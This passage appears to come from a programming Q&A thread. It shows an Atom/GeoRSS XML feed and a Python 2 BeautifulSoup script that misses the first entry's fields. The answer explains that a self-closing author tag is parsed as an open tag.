            <summary type="html">Test PUT Entry 3</summary>
            <id>7</id>
            <georss:point>21.94420760726878 17.44</georss:point>
            <updated>2014-11-24T09:55:31.000Z</updated>
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/7" rel="self" type="application/atom+xml" length="0" />
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/7/editEntry" rel="edit" type="application/atom+xml" length="0" />
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/7/comments" rel="replies" type="application/atom+xml" length="0" />
        </entry>
        <entry xmlns:georss="http://www.georss.org/georss">
            <title type="html">TEST REST</title>
            <content type="html">1</content>
            <author>
                <name>User213</name>
            </author>
            <summary type="html">Test PUT Entry 8</summary>
            <id>8</id>
            <georss:point>21.94420760726878 17.44</georss:point>
            <updated>2014-11-24T13:47:09.000Z</updated>
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/8" rel="self" type="application/atom+xml" length="0" />
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/8/editEntry" rel="edit" type="application/atom+xml" length="0" />
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/8/comments" rel="replies" type="application/atom+xml" length="0" />
        </entry>
        <entry xmlns:georss="http://www.georss.org/georss">
            <title type="html">TEST REST</title>
            <content type="html">1</content>
            <author>
                <name>User213</name>
            </author>
            <summary type="html">Test POST</summary>
            <id>12</id>
            <georss:point>21.94420760726878 17.44</georss:point>
            <updated>2014-11-25T14:29:02.000Z</updated>
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/12" rel="self" type="application/atom+xml" length="0" />
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/12/editEntry" rel="edit" type="application/atom+xml" length="0" />
            <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/12/comments" rel="replies" type="application/atom+xml" length="0" />
        </entry>
    </feed>

Python code:

    #!/usr/bin/python
    from BeautifulSoup import BeautifulSoup

    handler = open("/tmp/test.xml").read()
    soup = BeautifulSoup(handler)
    results = soup.findAll('entry')
    for r in results:
        print r
        print r.find('title').text
        print r.find('content').text
        print r.find('georss:point')
        print r.find('id')
        print r.find('updated')

And the output is the following:

    <entry xmlns:georss="http://www.georss.org/georss">
    <title type="html">TEST REST</title>
    <content type="html">1</content>
    </entry>
    TEST REST
    1
    None
    None
    None
    <entry xmlns:georss="http://www.georss.org/georss">
    <title type="html">TEST REST</title>
    <content type="html">1</content>
    <author>
    <name>User213</name>
    </author>
    <summary type="html">Test PUT Entry 8</summary>
    <id>8</id>
    <georss:point>21.94420760726878 17.44</georss:point>
    <updated>2014-11-24T13:47:09.000Z</updated>
    <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/8" rel="self" type="application/atom+xml" length="0" />
    <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/8/editEntry" rel="edit" type="application/atom+xml" length="0" />
    <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/8/comments" rel="replies" type="application/atom+xml" length="0" />
    </entry>
    TEST REST
    1
    <georss:point>21.94420760726878 17.44</georss:point>
    <id>8</id>
    <updated>2014-11-24T13:47:09.000Z</updated>
    <entry xmlns:georss="http://www.georss.org/georss">
    <title type="html">TEST REST</title>
    <content type="html">1</content>
    <author>
    <name>User213</name>
    </author>
    <summary type="html">Test POST</summary>
    <id>12</id>
    <georss:point>21.94420760726878 17.44</georss:point>
    <updated>2014-11-25T14:29:02.000Z</updated>
    <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/12" rel="self" type="application/atom+xml" length="0" />
    <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/12/editEntry" rel="edit" type="application/atom+xml" length="0" />
    <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/12/comments" rel="replies" type="application/atom+xml" length="0" />
    </entry>
    TEST REST
    1
    <georss:point>21.94420760726878 17.44</georss:point>
    <id>12</id>
    <updated>2014-11-25T14:29:02.000Z</updated>

Answer: From what I have tested with the following code:

    #!/usr/bin/python
    from BeautifulSoup import BeautifulSoup

    handler = open("./test.xml").read()
    soup = BeautifulSoup(handler)
    print soup.prettify()

The output looks like this:

    <?xml version='1.0' encoding='utf-8'?>
    <feed xmlns="http://www.w3.org/2005/Atom">
     <title type="text">
      News
     </title>
     <id>
      1
     </id>
     <link href="" />
     <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/entries" rel="self" />
     <updated>
      2014-11-26T10:41:12.424Z
     </updated>
     <author>
      <entry xmlns:georss="http://www.georss.org/georss">
       <title type="html">
        TEST REST
       </title>
       <content type="html">
        1
       </content>
      </entry>
     </author>
     <author>
      <name>
       User213
      </name>
     </author>

If you look closely, you will see that in your xml the `<author />` is seen as an open tag by BeautifulSoup. That's why you don't find the fields of the first entry: for BeautifulSoup they are outside the tag. Hope this'll help.